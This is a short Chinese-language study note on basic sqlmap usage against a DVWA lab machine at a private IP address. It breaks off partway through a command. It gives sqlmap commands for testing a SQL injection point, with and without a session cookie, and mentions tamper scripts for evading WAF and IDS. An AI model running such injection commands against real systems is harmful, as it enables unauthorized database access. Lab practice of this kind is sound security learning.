sqlmap基础笔记
靶机:192.168.2.248 (上面搭建的是dvwa)
工具:使用的kali2中的sqlmap
靶机注入点:http://192.168.2.248/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#
sqlmap tamper脚本(后期学习)
自动化,可以一定程度的绕过waf、ips、ids
基本的使用命令
第一步确认是否有入点
sqlmap -u "http://192.168.2.248/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#"
但是没有跑出来东西,原因没有没有加入cook,但是现在不知道为什么,如下图:
第一步(改,加入了cookie)
sqlmap -u "http://192.168.2.248/vulnerabilities/sqli/?id=1&Submit=%E6%8F%90%E4%BA%A4#" --cookie "PHPSESSID=ffrcrmdkpi9a38ma06v0baefrp;security